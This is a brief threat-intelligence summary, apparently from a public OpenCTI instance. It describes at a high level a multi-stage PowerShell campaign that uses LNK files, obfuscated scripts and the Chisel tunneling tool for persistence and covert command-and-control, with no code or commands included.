Dissecting A Multi-Stage PowerShell Campaign Using Chisel
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
A sophisticated multi-stage PowerShell campaign has been identified, utilizing an LNK file to initiate a sequence of obfuscated scripts. The attack maintains persistence and stealth by connecting with a command-and-control server. It employs Chisel, a fast TCP/UDP tunneling tool, and a Netskope proxy for covert communication, enabling lateral movement within compromised networks. The campaign involves three stages of PowerShell scripts, each with specific functions to establish persistence, communicate with the C&C server, and execute received commands. The presence of a Chisel DLL suggests advanced threat actor tactics aimed at prolonged control and evasion, indicating a highly organized or financially motivated operation.
OPENCTI LABELS :
powershell,command-and-control,lateral movement,lnk file,multi-stage,chisel,persistence
Open in NetmanageIT OpenCTI Public Instance with below link!
Use public read only username and password on login page.
NOTE : Use Public READ only user credentials on login page banner.
Dissecting A Multi-Stage PowerShell Campaign Using Chisel